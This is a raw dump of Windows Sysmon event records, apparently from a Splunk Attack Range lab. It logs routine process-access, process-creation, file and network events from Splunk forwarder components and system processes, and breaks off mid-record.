07:51:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081563Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081562Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081561Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081560Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081559Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081558Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B286-615A-4C01-00000000FD01}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081557Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.776{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B286-615A-4C01-00000000FD01}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081556Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.777{2FDD8D40-B286-615A-4C01-00000000FD01}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081555Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.448{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE8C981D4B8FDB2474F21A9BD8AA8D2D,SHA256=CB9B3E4B9C385BCC22069DE42E4242BD1C8B5256CBB6C86E68CD610740AAC535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081554Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:34.198{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81A9D9841FDEA32596CC4799DE416160,SHA256=51F054D4F90FB7E3253AEFF687785E9C6A350828C330EFAD9CC5E53A8EB90696,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081585Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.988{2FDD8D40-B287-615A-4D01-00000000FD01}2516696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081584Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B287-615A-4D01-00000000FD01}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081583Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081582Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081581Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081580Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081579Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081578Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081577Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081576Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081575Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081574Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B287-615A-4D01-00000000FD01}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081573Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.823{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B287-615A-4D01-00000000FD01}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081572Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.824{2FDD8D40-B287-615A-4D01-00000000FD01}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000081571Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:33.657{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50039-false10.0.1.12-8000- 23542300x800000000000000081570Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:35.495{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD221E05404A55324BF9A412C75AFE78,SHA256=4B52D4E3A243944ADD7D9FD13E60FC4A9039BC49D358D24DB08EDC9C4B83F4F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103689Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:35.001{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B40E1BD045138316FBF4F788CE123DE,SHA256=84E1DFD7C36017C27D06742C5E111D9514C5FD900300C7CAD1D596AF5A46643E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081601Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.863{2FDD8D40-B288-615A-4E01-00000000FD01}40283076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081600Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:36.614{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B288-615A-4E01-00000000FD01}4028C:\Program 